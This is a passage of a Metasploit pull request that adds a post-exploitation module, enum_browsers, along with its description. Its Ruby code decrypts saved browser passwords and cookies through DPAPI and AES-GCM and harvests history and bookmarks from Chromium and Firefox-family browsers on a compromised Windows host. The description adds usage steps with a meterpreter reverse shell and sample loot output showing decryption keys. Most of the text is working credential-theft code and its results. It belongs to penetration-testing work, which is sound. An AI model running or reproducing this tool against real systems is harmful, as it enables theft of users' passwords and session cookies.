+      ret = session.railgun.crypt32.CryptUnprotectData(
+        pdatain, nil, nil, nil, nil, 0, 2048
+      )
+
+      len, addr = ret['pDataOut'].unpack(inout_fmt)
+      decrypted_data = len == 0 ? nil : session.railgun.memread(addr, len)
+
+      session.railgun.kernel32.LocalFree(mem)
+      session.railgun.kernel32.LocalFree(addr) if addr != 0
+
+      print_good('Decryption successful') if datastore['VERBOSE']
+      return decrypted_data.strip
+    rescue StandardError => e
+      print_error("Error during DPAPI decryption: #{e.message}")
+      return nil
+    end
+  end
+
+  def get_encryption_key(local_state_path)
+    print_status("Getting encryption key from: #{local_state_path}") if datastore['VERBOSE']
+
+    if file?(local_state_path)
+      local_state = read_file(local_state_path)
+      json_state = begin
+        JSON.parse(local_state)
+      rescue StandardError
+        nil
+      end
+
+      if json_state.nil?
+        print_error('Failed to parse JSON from Local State file')
+        return nil
+      end
+
+      if json_state['os_crypt'] && json_state['os_crypt']['encrypted_key']
+        encrypted_key = json_state['os_crypt']['encrypted_key']
+        encrypted_key_bin = begin
+          Base64.decode64(encrypted_key)[5..]
+        rescue StandardError
+          nil
+        end
+
+        if encrypted_key_bin.nil?
+          print_error('Failed to Base64 decode the encrypted key')
+          return nil
+        end
+
+        print_status("Encrypted key (Base64-decoded, hex): #{encrypted_key_bin.unpack('H*').first}") if datastore['VERBOSE']
+        decrypted_key = decrypt_data(encrypted_key_bin)
+
+        if decrypted_key
+          print_good("Decrypted key (hex): #{decrypted_key.unpack('H*').first}") if datastore['VERBOSE']
+          return decrypted_key
+        else
+          print_error('Failed to decrypt the encryption key.')
+          return nil
+        end
+      else
+        print_error('os_crypt or encrypted_key not found in Local State')
+        return nil
+      end
+    else
+      print_error("Local State file not found at: #{local_state_path}")
+      return nil
+    end
+  end
+
+  def decrypt_chromium_password(encrypted_password, key)
+    return print_error('Invalid encrypted password length') if encrypted_password.nil? || encrypted_password.length < (IV_SIZE + TAG_SIZE)
+
+    iv = encrypted_password[3, IV_SIZE]
+    ciphertext = encrypted_password[IV_SIZE + 3...-TAG_SIZE]
+    tag = encrypted_password[-TAG_SIZE..]
+
+    if iv.nil? || iv.length != IV_SIZE
+      print_error("Invalid IV: expected #{IV_SIZE} bytes, got #{iv.nil? ? 'nil' : iv.length} bytes")
+      return nil
+    end
+
+    begin
+      aes = OpenSSL::Cipher.new('aes-256-gcm')
+      aes.decrypt
+      aes.key = key
+      aes.iv = iv
+      aes.auth_tag = tag
+
+      decrypted_password = aes.update(ciphertext) + aes.final
+      return decrypted_password
+    rescue OpenSSL::Cipher::CipherError => e
+      print_error("Failed to decrypt password: #{e.message}")
+      return nil
+    end
+  end
+
+  def extract_chromium_data(profile_path, encryption_key, browser)
+    return print_error("Profile path #{profile_path} not found") unless directory?(profile_path)
+
+    login_data_path = "#{profile_path}\\Login Data"
+    return print_error("Login Data not found at #{login_data_path}") unless file?(login_data_path)
+
+    extract_sql_data(login_data_path, 'SELECT origin_url, username_value, password_value FROM logins', 'passwords', browser, encryption_key)
+
+    cookies_path = "#{profile_path}\\Network\\Cookies"
+    if file?(cookies_path)
+      begin
+        extract_sql_data(cookies_path, 'SELECT host_key, name, path, encrypted_value FROM cookies', 'cookies', browser, encryption_key)
+      rescue StandardError => e
+        if e.message.include?('core_channel_open')
+          print_error('└ Cannot access Cookies. File in use by another process.')
+        else
+          print_error("An error occurred while extracting Chromium cookies: #{e.message}")
+        end
+      end
+    else
+      print_error("Cookies not found at #{cookies_path}")
+    end
+
+    extract_sql_data("#{profile_path}\\History", 'SELECT url, title, visit_count, last_visit_time FROM urls', 'history', browser)
+
+    extract_json_bookmarks("#{profile_path}\\Bookmarks", 'bookmarks', browser)
+  end
+
+  def extract_gecko_data(profile_path, browser)
+    extract_json_data("#{profile_path}\\logins.json", 'logins', browser)
+    extract_sql_data("#{profile_path}\\cookies.sqlite", 'SELECT host, name, path, value, expiry FROM moz_cookies', 'cookies', browser)
+    extract_sql_data("#{profile_path}\\places.sqlite", 'SELECT url, title, visit_count, last_visit_date FROM moz_places', 'history', browser)
+    extract_sql_data("#{profile_path}\\places.sqlite", 'SELECT moz_bookmarks.title AS title, moz_places.url AS url FROM moz_bookmarks JOIN moz_places ON moz_bookmarks.fk = moz_places.id', 'bookmarks', browser)
+  end
+
+  def extract_json_bookmarks(bookmarks_path, data_type, browser)
+    if file?(bookmarks_path)
+      bookmarks_data = read_file(bookmarks_path)
+      bookmarks_json = JSON.parse(bookmarks_data)
+
+      bookmarks = []
+
+      if bookmarks_json['roots']['bookmark_bar']
+        traverse_bookmarks(bookmarks_json['roots']['bookmark_bar'], bookmarks)
+      end
+      if bookmarks_json['roots']['other']
+        traverse_bookmarks(bookmarks_json['roots']['other'], bookmarks)
+      end
+
+      browser_clean = browser.gsub('\\', '_').chomp('_')
+      timestamp = Time.now.strftime('%Y%m%d%H%M')
+      ip = session.sock.peerhost
+
+      if bookmarks.any?
+        bookmark_entries = bookmarks.map { |bookmark| "#{bookmark[:name]}: #{bookmark[:url]}" }.join("\n")
+        file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, bookmark_entries, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")
+
+        file_size = ::File.size(file_name)
+
+        print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
+      end
+    else
+      print_error("Bookmarks file not found at #{bookmarks_path}")
+    end
+  end
+
+  def traverse_bookmarks(bookmark_node, bookmarks)
+    if bookmark_node['children']
+      bookmark_node['children'].each do |child|
+        if child['type'] == 'url'
+          bookmarks << { name: child['name'], url: child['url'] }
+        elsif child['type'] == 'folder' && child['children']
+          traverse_bookmarks(child, bookmarks)
+        end
+      end
+    end
+  end
+
+  def extract_sql_data(db_path, query, data_type, browser, encryption_key = nil)
+    if file?(db_path)
+      db_local_path = "#{Rex::Text.rand_text_alpha(8)}.db"
+      session.fs.file.download_file(db_local_path, db_path)
+
+      begin
+        db = SQLite3::Database.open(db_local_path)
+        result = db.execute(query)
+
+        if encryption_key
+          result.each do |row|
+            next unless row[-1]
+
+            if data_type == 'cookies' && row[-1].length >= (IV_SIZE + TAG_SIZE + 3)
+              row[-1] = decrypt_chromium_password(row[-1], encryption_key)
+            elsif data_type == 'passwords' && row[2].length >= (IV_SIZE + TAG_SIZE + 3)
+              row[2] = decrypt_chromium_password(row[2], encryption_key)
+            end
+          end
+        end
+
+        browser_clean = browser.gsub('\\', '_').chomp('_')
+        timestamp = Time.now.strftime('%Y%m%d%H%M')
+        ip = session.sock.peerhost
+        file_name = store_loot("#{browser_clean}_#{data_type}", 'text/plain', session, result, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.txt", "#{browser_clean} #{data_type.capitalize}")
+
+        file_size = ::File.size(file_name)
+
+        print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
+      ensure
+        db.close
+        ::File.delete(db_local_path) if ::File.exist?(db_local_path)
+      end
+    end
+  end
+
+  def extract_json_data(json_path, data_type, browser)
+    if file?(json_path)
+      json_data = read_file(json_path)
+
+      browser_clean = browser.gsub('\\', '_').chomp('_')
+      timestamp = Time.now.strftime('%Y%m%d%H%M')
+      ip = session.sock.peerhost
+      file_name = store_loot("#{browser_clean}_#{data_type}", 'application/json', session, json_data, "#{timestamp}_#{ip}_#{browser_clean}_#{data_type}.json", "#{browser_clean} #{data_type.capitalize}")
+
+      file_size = ::File.size(file_name)
+
+      print_good("└ Extracted #{data_type.capitalize} to #{file_name} (#{file_size} bytes)")
+    end
+  end
+
+end


### PR DESCRIPTION
This post-exploitation module extracts saved user data from various Chromium-based and Gecko-based browsers and decrypts sensitive information, such as passwords and cookies. The module can also extract history & bookmarks. Chromium encrypts sensitive data (e.g., passwords and cookies) using Windows Data Protection API (DPAPI), which can only be decrypted with the **same** logon credentials. This module uses the current user's credentials to decrypt the sensitive data unless specified otherwise.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`.
- [ ] Obtain a meterpreter session on the target system. (e.g., `set payload windows/x64/meterpreter/reverse_tcp`)
- [ ] Run the module: `use post/windows/gather/enum_browsers`
- [ ] Set the appropriate session ID: `set SESSION <session id>`
- [ ] (Optional) Enable verbose mode if you want detailed output: `set VERBOSE true`
- [ ] (Optional) Kill browser processes before extraction to avoid file access issues: `set KILL_BROWSER true`
- [ ] Run the module: `run`
- [ ] You should see the extracted browser data in the loot files.

## Example Output

### Meterpreter Session as Normal User

```bash
[*] Current user profile: C:\Users\ah
[*] Found Microsoft Edge
[+] └ Extracted Passwords to /root/.msf4/loot/20240921193101_default_192.168.0.29_MicrosoftEdge_p_679268.txt (395 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921193101_default_192.168.0.29_MicrosoftEdge_c_877807.txt (9088 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921193102_default_192.168.0.29_MicrosoftEdge_h_673551.txt (507 bytes)
[*] Found Brave
[+] └ Extracted Passwords to /root/.msf4/loot/20240921193105_default_192.168.0.29_Brave_passwords_575498.txt (73261 bytes)
[-] └ Cannot access Cookies. File in use by another process.
[+] └ Extracted History to /root/.msf4/loot/20240921193119_default_192.168.0.29_Brave_history_439185.txt (2498413 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193119_default_192.168.0.29_Brave_bookmarks_445491.txt (8601 bytes)
[*] Found Mozilla Firefox
[+] └ Extracted Logins to /root/.msf4/loot/20240921193123_default_192.168.0.29_MozillaFirefox__293343.json (522906 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921193124_default_192.168.0.29_MozillaFirefox__014088.txt (8215 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921193128_default_192.168.0.29_MozillaFirefox__763526.txt (408097 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193132_default_192.168.0.29_MozillaFirefox__322216.txt (9690 bytes)
[*] Found Thunderbird
[+] └ Extracted Logins to /root/.msf4/loot/20240921193133_default_192.168.0.29_Thunderbird_logi_351433.json (3136 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921193134_default_192.168.0.29_Thunderbird_cook_018921.txt (3200 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921193137_default_192.168.0.29_Thunderbird_hist_367914.txt (3577 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921193141_default_192.168.0.29_Thunderbird_book_725692.txt (2 bytes)
[*] Post module execution completed
```

### Using KILL_BROWSER to Resolve File Access Issues

If the browser processes are running, cookies and other files may be locked and inaccessible. Use the `KILL_BROWSER` option to stop browsers before extraction:

```bash
msf6 post(windows/gather/enum_browsers) > set KILL_BROWSER true
KILL_BROWSER => true
msf6 post(windows/gather/enum_browsers) > run

[*] Current user profile: C:\Users\ah
[*] Found Microsoft Edge
[+] └ Extracted Passwords to /root/.msf4/loot/20240921201057_default_192.168.0.29_MicrosoftEdge_p_232893.txt (395 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921201057_default_192.168.0.29_MicrosoftEdge_c_077883.txt (9088 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921201058_default_192.168.0.29_MicrosoftEdge_h_507564.txt (507 bytes)
[*] Found Brave
[+] └ Extracted Passwords to /root/.msf4/loot/20240921201106_default_192.168.0.29_Brave_passwords_884652.txt (73261 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921201107_default_192.168.0.29_Brave_cookies_674752.txt (261116 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921201121_default_192.168.0.29_Brave_history_006361.txt (2500006 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201122_default_192.168.0.29_Brave_bookmarks_698530.txt (8601 bytes)
[*] Found Mozilla Firefox
[+] └ Extracted Logins to /root/.msf4/loot/20240921201125_default_192.168.0.29_MozillaFirefox__055989.json (522906 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921201126_default_192.168.0.29_MozillaFirefox__643594.txt (8215 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921201130_default_192.168.0.29_MozillaFirefox__071330.txt (408097 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201134_default_192.168.0.29_MozillaFirefox__633130.txt (9690 bytes)
[*] Found Thunderbird
[+] └ Extracted Logins to /root/.msf4/loot/20240921201134_default_192.168.0.29_Thunderbird_logi_562248.json (3136 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921201135_default_192.168.0.29_Thunderbird_cook_115306.txt (3200 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921201139_default_192.168.0.29_Thunderbird_hist_108812.txt (3577 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921201143_default_192.168.0.29_Thunderbird_book_912944.txt (2 bytes)
[*] Post module execution completed
```

This will kill any running browser processes and avoid file access issues.

### Using VERBOSE Mode for Detailed Output

If you want to see each step of the extraction and decryption process, enable verbose mode:

```bash
msf6 post(windows/gather/enum_browsers) > set VERBOSE true
VERBOSE => true
msf6 post(windows/gather/enum_browsers) > run

[*] Current user profile: C:\Users\ah
[*] Found Microsoft Edge
[*] Getting encryption key from: C:\Users\ah\AppData\Local\Microsoft\Edge\\User Data\Local State
[*] Encrypted key (Base64-decoded, hex): 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f74ba6ec3e4f774394b60c6be17156cb100000001e0000004d006900630072006f0073006f0066007400200045006400670065000000106600000001000020000000571587f33c18930a9c79ce75b7156c64d159a5e305204ca0d7d49215275428fa000000000e8000000002000020000000b4e331d5a62b6548e21ea4ecc630fb0ac3ed6dce39bc35c1e2cde61da6486ced30000000d65f5c3cb0591b058a69481e8e39b817de086e25d13d35c4d3450a31d2fc78fa6f2a47af19020963f13ae82b2967c4f34000000039a14221c9462dd252eee1df0ce0bdf7135a00d8a06ab6496bf4f957d196728165e2b3d982f35205c4adad3bd64954570a5f0018d90ec9dc23fb54af11080e86
[*] Starting DPAPI decryption process
[+] Decryption successful
[+] Decrypted key (hex): 16c25d5e81e9f1b4729bc412e250f2fa5b2e5b90d7e439768694b1630490e670
[+] └ Extracted Passwords to /root/.msf4/loot/20240921194816_default_192.168.0.29_MicrosoftEdge_p_903608.txt (395 bytes)
[+] └ Extracted Cookies to /root/.msf4/loot/20240921194817_default_192.168.0.29_MicrosoftEdge_c_562771.txt (9088 bytes)
[+] └ Extracted History to /root/.msf4/loot/20240921194817_default_192.168.0.29_MicrosoftEdge_h_074342.txt (507 bytes)
[*] Found Brave
[*] Getting encryption key from: C:\Users\ah\AppData\Local\BraveSoftware\Brave-Browser\\User Data\Local State
[*] Encrypted key (Base64-decoded, hex): 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000f74ba6ec3e4f774394b60c6be17156cb100000001c000000420072006100760065002000420072006f0077007300650072000000106600000001000020000000b1feb406d73aacc418e6048f0b7e1c54d97af7e6d343f8620fbcadf729ba7d5d000000000e8000000002000020000000c4ff71c562c25f380679b1a1bca886e5ef6f53b9e72d2392890c483608b991a1300000009edaa62eb3b99fbfca9aa6ad0a43da2ccfb2889aaba35458b9dd4163460de17733a169dd83658f9416fd11f5fc87733340000000239998fef8ca1d69824853411954f207df5f173a28c4b8505723a23e5698fa0352eb24435ea763839311cab42d269a9c2456c6c2e74c2edbe6001ad45b13d8b2
[*] Starting DPAPI decryption process
[+] Decryption successful
[+] Decrypted key (hex): 131c159c5460a2e1cf40502794865da88789f6f96da77ec105cc0ee5b21ce632
[+] └ Extracted Passwords to /root/.msf4/loot/20240921194820_default_192.168.0.29_Brave_passwords_463764.txt (73261 bytes)
[-] └ Cannot access Cookies. File in use by another process.
[+] └ Extracted History to /root/.msf4/loot/20240921194834_default_192.168.0.29_Brave_history_896256.txt (2499456 bytes)
[+] └ Extracted Bookmarks to /root/.msf4/loot/20240921194835_default_192.168.0.29_Brave_bookmarks_159673.txt (8601 bytes)

We will also accept demonstrations of successful module execution even if your module doesn't meet the above conditions. It's not a necessity, but it may help us land your module faster!

Demonstration of successful module execution can take the form of a packet capture (pcap) or a screen recording. You can send pcaps and recordings to [msfdev@metasploit.com](mailto:msfdev@metasploit.com). Please include a CVE number in the subject header (if applicable), and a link to your PR in the email body.
If you wish to sanitize your pcap, please see the [wiki](https://docs.metasploit.com/docs/development/get-started/sanitizing-pcaps.html).
